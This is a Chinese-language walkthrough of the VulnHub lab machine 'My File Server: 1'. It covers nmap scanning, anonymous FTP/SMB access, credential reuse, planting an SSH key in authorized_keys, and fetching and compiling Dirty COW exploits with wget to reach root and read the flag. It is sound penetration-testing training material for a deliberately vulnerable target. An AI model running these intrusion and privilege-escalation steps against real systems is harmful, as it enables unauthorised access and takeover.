Vulnhub靶机渗透:MY FILE SERVER: 1

MY FILE SERVER: 1

  • nmap扫描
    • 端口扫描
    • 服务扫描
    • 漏洞扫描
    • 选择渗透方向
  • 21/2121 ftp
  • 445 samba
  • 2049/20048 nfs
  • 80 http
    • 目录爆破
  • 获得立足点
  • 提权
    • 40611
    • 40847
  • 获取flag

靶机链接: https://www.vulnhub.com/entry/my-file-server-1,432/
靶机IP:192.168.54.33
kali IP:192.168.54.128

nmap扫描

端口扫描

# Nmap 7.93 scan initiated Sun Jun 11 14:23:28 2023 as: nmap -sT --min-rate 10000 -p- -oN nmap/ports 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.0050s latency).
Not shown: 64504 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach), 1004 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 00:0C:29:42:CC:6A (VMware)

# Nmap done at Sun Jun 11 14:23:41 2023 -- 1 IP address (1 host up) scanned in 13.33 seconds
# Nmap 7.93 scan initiated Sun Jun 11 14:24:25 2023 as: nmap -sU --min-rate 10000 --top-ports 20 -oN nmap/udp 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00035s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    filtered      tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   filtered      microsoft-ds
500/udp   filtered      isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp filtered      unknown
MAC Address: 00:0C:29:42:CC:6A (VMware)

# Nmap done at Sun Jun 11 14:24:25 2023 -- 1 IP address (1 host up) scanned in 0.48 seconds

处理信息,获取开放端口

# yunki @ yunki in ~/vulnhub/myfileserver1 [14:27:24] 
$ grep open nmap/ports | awk -F'/' '{print$1}'| paste -sd ','
21,22,80,111,445,2049,2121,20048

服务扫描

# Nmap 7.93 scan initiated Sun Jun 11 14:29:33 2023 as: nmap -sT -sVC -O -p21,22,80,111,445,2049,2121,20048 -oN nmap/details 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00045s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.54.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75fa37d1624a15877e2183b92fff0493 (RSA)
|   256 b8db2ccae270c3eb9aa8cc0ea21c686b (ECDSA)
|_  256 66a31b55cac2518441217f774045d49f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: My File Server
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      34309/tcp6  nlockmgr
|   100021  1,3,4      39139/tcp   nlockmgr
|   100021  1,3,4      49696/udp   nlockmgr
|   100021  1,3,4      60509/udp6  nlockmgr
|   100024  1          34732/tcp6  status
|   100024  1          43955/tcp   status
|   100024  1          45560/udp   status
|   100024  1          57303/udp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:42:CC:6A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.10, Linux 3.4 - 3.10
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix

Host script results:
|_clock-skew: mean: 6h10m01s, deviation: 3h10m28s, median: 7h59m58s
| smb2-time: 
|   date: 2023-06-11T14:29:43
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2023-06-11T19:59:47+05:30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 11 14:29:54 2023 -- 1 IP address (1 host up) scanned in 21.59 seconds

漏洞扫描

# Nmap 7.93 scan initiated Sun Jun 11 14:30:11 2023 as: nmap --script=vuln -p21,22,80,111,445,2049,2121,20048 -oN nmap/vuln 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00029s latency).

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 00:0C:29:42:CC:6A (VMware)

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-061: false

# Nmap done at Sun Jun 11 14:30:54 2023 -- 1 IP address (1 host up) scanned in 42.80 seconds

选择渗透方向

观察服务,发现

  • 21端口,ftp服务,可以匿名登录,可写。
  • 22端口,openssh服务。
  • 80端口,apache服务。操作系统centos。
  • 111端口,rpc服务。
  • 445端口,samba服务,tcp协议。
  • 2049端口,nfs服务,和111端口上的细节可以呼应上。
  • 2121端口,ftp服务,可以匿名登录。
  • 20048端口,可以挂载nfs服务,与111端口相呼应。
    总结一下:21, samba,nfs, 80....

21/2121 ftp

$ ftp 192.168.54.33
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    3 0        0              16 Feb 19  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    9 0        0            4096 Feb 19  2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Feb 19  2020 anaconda
drwxr-x---    2 0        0              22 Feb 19  2020 audit
-rw-r--r--    1 0        0            7033 Feb 19  2020 boot.log
-rw-------    1 0        0           10752 Feb 19  2020 btmp
-rw-r--r--    1 0        0            9161 Feb 19  2020 cron
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg.old
drwxr-xr-x    2 0        0               6 Feb 19  2020 glusterfs
drwx------    2 0        0              39 Feb 19  2020 httpd
-rw-r--r--    1 0        0          292584 Feb 19  2020 lastlog
-rw-------    1 0        0            3764 Feb 19  2020 maillog
-rw-------    1 0        0         1423423 Feb 19  2020 messages
drwx------    2 0        0               6 Feb 19  2020 ppp
drwx------    4 0        0              43 Feb 19  2020 samba
-rw-------    1 0        0           63142 Feb 19  2020 secure
-rw-------    1 0        0               0 Feb 19  2020 spooler
-rw-------    1 0        0               0 Feb 19  2020 tallylog
drwxr-xr-x    2 0        0              22 Feb 19  2020 tuned
-rw-r--r--    1 0        0           58752 Feb 19  2020 wtmp
-rw-------    1 0        0             100 Feb 19  2020 xferlog
-rw-------    1 0        0           18076 Feb 19  2020 yum.log
226 Directory send OK.

通过查看,这里比较感兴趣的是secure文件,但是目前没有权限,检查一下2121端口

$ ftp 192.168.54.33 2121
Connected to 192.168.54.33.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.54.33]
Name (192.168.54.33:yunki): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root           16 Feb 19  2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   9 root     root         4096 Feb 19  2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Feb 19  2020 anaconda
drwxr-x---   2 root     root           22 Feb 19  2020 audit
-rw-r--r--   1 root     root         7033 Feb 19  2020 boot.log
-rw-------   1 root     root        10752 Feb 19  2020 btmp
-rw-r--r--   1 root     root         9161 Feb 19  2020 cron
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg.old
drwxr-xr-x   2 root     root            6 Feb 19  2020 glusterfs
drwx------   2 root     root           39 Feb 19  2020 httpd
-rw-r--r--   1 root     root       292584 Feb 19  2020 lastlog
-rw-------   1 root     root         3764 Feb 19  2020 maillog
-rw-------   1 root     root      1423423 Feb 19  2020 messages
drwx------   2 root     root            6 Feb 19  2020 ppp
drwx------   4 root     root           43 Feb 19  2020 samba
-rw-------   1 root     root        63142 Feb 19  2020 secure
-rw-------   1 root     root            0 Feb 19  2020 spooler
-rw-------   1 root     root            0 Feb 19  2020 tallylog
drwxr-xr-x   2 root     root           22 Feb 19  2020 tuned
-rw-r--r--   1 root     root        58752 Feb 19  2020 wtmp
-rw-------   1 root     root          100 Feb 19  2020 xferlog
-rw-------   1 root     root        18076 Feb 19  2020 yum.log
226 Transfer complete
ftp> exit
221 Goodbye.

和21端口一样没有信息。那就下一个。

445 samba

$ sudo smbmap -H 192.168.54.33          
[+] IP: 192.168.54.33:445       Name: 192.168.54.33                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        smbdata                                                 READ, WRITE     smbdata
        smbuser                                                 NO ACCESS       smbuser
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.1)
# yunki @ yunki in ~/vulnhub/myfileserver1 [15:27:56] 
$ smbclient //192.168.54.33/smbdata
Password for [WORKGROUP\yunki]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls -liah
NT_STATUS_NO_SUCH_FILE listing \-liah
smb: \> ls
  .                                   D        0  Sun Jun 11 23:01:12 2023
  ..                                  D        0  Tue Feb 18 19:47:54 2020
  anaconda                            D        0  Tue Feb 18 19:48:15 2020
  audit                               D        0  Tue Feb 18 19:48:15 2020
  boot.log                            N     6120  Tue Feb 18 19:48:16 2020
  btmp                                N      384  Tue Feb 18 19:48:16 2020
  cron                                N     4813  Tue Feb 18 19:48:16 2020
  dmesg                               N    31389  Tue Feb 18 19:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 19:48:16 2020
  glusterfs                           D        0  Tue Feb 18 19:48:16 2020
  lastlog                             N   292292  Tue Feb 18 19:48:16 2020
  maillog                             N     1982  Tue Feb 18 19:48:16 2020
  messages                            N   684379  Tue Feb 18 19:48:17 2020
  ppp                                 D        0  Tue Feb 18 19:48:17 2020
  samba                               D        0  Tue Feb 18 19:48:17 2020
  secure                              N    11937  Tue Feb 18 19:48:17 2020
  spooler                             N        0  Tue Feb 18 19:48:17 2020
  tallylog                            N        0  Tue Feb 18 19:48:17 2020
  tuned                               D        0  Tue Feb 18 19:48:17 2020
  wtmp                                N    25728  Tue Feb 18 19:48:17 2020
  xferlog                             N      100  Tue Feb 18 19:48:17 2020
  yum.log                             N    10915  Tue Feb 18 19:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 15:46:38 2020

                19976192 blocks of size 1024. 18284616 blocks available
smb: \> get secure
getting file \secure of size 11937 as secure (685.7 KiloBytes/sec) (average 685.7 KiloBytes/sec)
smb: \> get sshd_config
getting file \sshd_config of size 3906 as sshd_config (762.9 KiloBytes/sec) (average 703.3 KiloBytes/sec)
smb: \> exit

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:28:14] 
$ cat secure      
...
# yunki @ yunki in ~/vulnhub/myfileserver1 [15:28:18] 
$ cat sshd_config
...

通过阅读secure文件,发现了以下信息。
在这里插入图片描述
写入cred.txt

$ echo 'smbuser:chauthtok' >> cred.txt

这里尝试一下密码碰撞,登录21端口ftp,失败。 2121端口,ftp失败,22端口欧ssh,失败。
通过阅读额sshd_config文件,能够看到以下信息。
Vulnhub靶机渗透:MY FILE SERVER: 1_第1张图片
目前只能密钥登录,所以ssh使用密码登录已经不可能了。

2049/20048 nfs

$ showmount -e 192.168.54.33       
Export list for 192.168.54.33:
/smbdata 192.168.56.0/24

这里显示存在smbdata,但是需要在56网段才可以访问,目前的环境是54,就先不麻烦修改了,先尝试其他思路,如果实在没有突破口了,就回到这里继续。

80 http

打开网页,就发现一个my file server就没有了。直接目录爆破。

目录爆破

$ sudo gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,html,rar,txt,sql,jsp,php --url http://192.168.54.33/ --no-error| tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.54.33/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,zip,html,rar,txt,sql,jsp
[+] Timeout:                 10s
===============================================================
2023/06/11 15:41:29 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 174]
/.html                (Status: 403) [Size: 207]
/readme.txt           (Status: 200) [Size: 25]
/.html                (Status: 403) [Size: 207]
Progress: 1761220 / 1764488 (99.81%)
===============================================================
2023/06/11 15:45:23 Finished
===============================================================
Progress: 1764480 / 1764488 (100.00%)

发现了存在readme.txt,访问发现密码,写入到cred.txt中

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:43:58] C:130
$ curl http://192.168.54.33/readme.txt
My Password is
rootroot1

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:44:09] 
$ echo rootroot1 >> cred.txt

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:44:25] 
$ cat cred.txt                        
smbuser:chauthtok
rootroot1

由于无法使用密码登录ssh,重新使用这个密码进行碰撞ftp/smb服务。

获得立足点

这里使用smbuser:rootroot1登录到ftp服务中,发现路径是/home/smbuser

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:46:24] 
$ ftp 192.168.54.33     
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/home/smbuser"

这里可以想到用ssh-keygen生成公钥和私钥,将公钥上传到之前发现的路径~/.ssh/authorized_keys中,然后使用私钥登录。尝试一下。
先试用ssh-keygen生成密钥对。

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:48:41] 
$ sudo ssh-keygen                       
[sudo] yunki 的密码:
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): test
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in test
Your public key has been saved in test.pub
The key fingerprint is:
SHA256:g8VyEwz68HDLaiwG1bhiWpvVUXZEk61+38D/W91oabo root@yunki
The key's randomart image is:
+---[RSA 3072]----+
|      .o+o=o     |
|   o . +.o...    |
|  o = + =  .     |
| . . O B ..      |
|o.o . B S.   .   |
|o+ = .   .. . ooo|
|. = +      . .=++|
| . o         +. +|
|            E. .+|
+----[SHA256]-----+

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:03] 
$ ls
80  cred.txt  gobuster.log  linPEAS.sh  nmap  secure  sshd_config  test  test.pub

改成之前sshd_config文件里要求的名称。重新连接ftp,创建.ssh文件夹,上传文件,退出,ssh -i登录。成功! 获得立足点!

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:04] 
$ cp test.pub authorized_keys       

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:23] 
$ ftp 192.168.54.33
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/smbuser"
ftp> mkdir .ssh
257 "/home/smbuser/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
564 bytes sent in 0.00 secs (4.7599 MB/s)
ftp> exit
221 Goodbye.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:45] 
$ sudo ssh -i test [email protected]
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 1                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Thu Feb 20 16:42:21 2020
[smbuser@fileserver ~]$ whoami
smbuser

提权

[smbuser@fileserver ~]$ whoami
smbuser
[smbuser@fileserver ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:cc:6a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.33/24 brd 192.168.54.255 scope global dynamic ens32
       valid_lft 1545sec preferred_lft 1545sec
    inet6 fe80::20c:29ff:fe42:cc6a/64 scope link 
       valid_lft forever preferred_lft forever
[smbuser@fileserver ~]$ uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

这里发现内核版本较低,可以尝试使用内核提权。先上传一下linPEAS.sh,收集一下信息。

kali

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:56:16] 
$ ls linPEAS.sh 
linPEAS.sh

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:56:26] 
$ php -S 0:80
[Sun Jun 11 15:56:28 2023] PHP 7.4.15 Development Server (http://0:80) started
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 Accepted
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 [200]: (null) /linPEAS.sh
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 Closing

靶机

smbuser@fileserver ~]$ cd /tmp
[smbuser@fileserver tmp]$ ls
systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ wget http://192.168.54.128/linPEAS.sh
--2023-06-11 21:00:34--  http://192.168.54.128/linPEAS.sh
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:828172 (809K) [application/x-sh]
正在保存至: “linPEAS.sh”

100%[===============================================================================================================>] 828,172     --.-K/s 用时 0.03s   

2023-06-11 21:00:34 (30.8 MB/s) - 已保存 “linPEAS.sh” [828172/828172])

[smbuser@fileserver tmp]$ chmod +x linPEAS.sh 
[smbuser@fileserver tmp]$ ./linPEAS.sh 

通过观察结果,这里列出比较有用的内核提权信息。
Vulnhub靶机渗透:MY FILE SERVER: 1_第2张图片
先尝试尝试这两个,先下载到kali里,然后kali开启服务器。
kali

# yunki @ yunki in ~/vulnhub/myfileserver1 [16:00:18] C:130
$ searchsploit -m 40611 40847           
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)
      URL: https://www.exploit-db.com/exploits/40611
     Path: /usr/share/exploitdb/exploits/linux/local/40611.c
    Codes: CVE-2016-5195
 Verified: True
File Type: C source, ASCII text
Copied to: /home/yunki/vulnhub/myfileserver1/40611.c


  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
    Codes: CVE-2016-5195
 Verified: True
File Type: C++ source, ASCII text
Copied to: /home/yunki/vulnhub/myfileserver1/40847.cpp



# yunki @ yunki in ~/vulnhub/myfileserver1 [16:00:35] 
$ php -S 0:80
[Sun Jun 11 16:00:51 2023] PHP 7.4.15 Development Server (http://0:80) started
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 Accepted
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 [200]: (null) /40611.c
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 Closing
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 Accepted
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 [200]: (null) /40847.cpp
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 Closing

40611

[smbuser@fileserver tmp]$ wget http://192.168.54.128/40611.c
--2023-06-11 21:05:01--  http://192.168.54.128/40611.c
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2821 (2.8K) [text/x-c]
正在保存至: “40611.c”

100%[===============================================================================================================>] 2,821       --.-K/s 用时 0s      

2023-06-11 21:05:01 (666 MB/s) - 已保存 “40611.c” [2821/2821])


[smbuser@fileserver tmp]$ ls
40611.c  40847.cpp  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ head 40611.c 
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w


[smbuser@fileserver tmp]$ gcc -pthread 40611.c -o 40611
[smbuser@fileserver tmp]$ ls
40611  40611.c  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ ./40611 
usage: dirtyc0w target_file new_content

根据提示好像只能读取文件,尝试一下能不能读取/etc/shadow文件。

[smbuser@fileserver tmp]$ ./40611 
usage: dirtyc0w target_file new_content
[smbuser@fileserver tmp]$ ./40611 /etc/shadow /tmp/shadow
mmap ffffffffffffffff

 
ls
^C
[smbuser@fileserver tmp]$ ls
40611  40611.c  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT

好像没有读取到,失败~

40847

[smbuser@fileserver tmp]$ wget http://192.168.54.128/40847.cpp
--2023-06-11 21:05:10--  http://192.168.54.128/40847.cpp
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:10212 (10.0K) [text/x-c]
正在保存至: “40847.cpp”

100%[===============================================================================================================>] 10,212      --.-K/s 用时 0s      

2023-06-11 21:05:10 (410 MB/s) - 已保存 “40847.cpp” [10212/10212])


[smbuser@fileserver tmp]$ head 40847.cpp 
// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run:   ./dcow -s    (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016  Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.


[smbuser@fileserver tmp]$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
[smbuser@fileserver tmp]$ ls
40611  40611.c  40847.cpp  dcow  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ ./dcow
Running ...
Received su prompt (密码:)
Root password is:   dirtyCowFun
Enjoy! :-)

利用成功,生成了密码dirtyCowFun,直接切换root用户。

[smbuser@fileserver tmp]$ su
密码:
[root@fileserver tmp]# whoami
root

获取flag

[root@fileserver tmp]# whoami
root

[root@fileserver tmp]# uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

[root@fileserver tmp]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:cc:6a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.33/24 brd 192.168.54.255 scope global dynamic ens32
       valid_lft 1440sec preferred_lft 1440sec
    inet6 fe80::20c:29ff:fe42:cc6a/64 scope link 
       valid_lft forever preferred_lft forever

[root@fileserver tmp]# ls /root
proof.txt
[root@fileserver tmp]# cat proof.txt
cat: proof.txt: 没有那个文件或目录
[root@fileserver tmp]# cat /root/proof.txt 
Best of Luck
af52e0163b03cbf7c6dd146351594a43

你可能感兴趣的:(渗透测试,打靶,vulnhub,网络,udp,tcp/ip)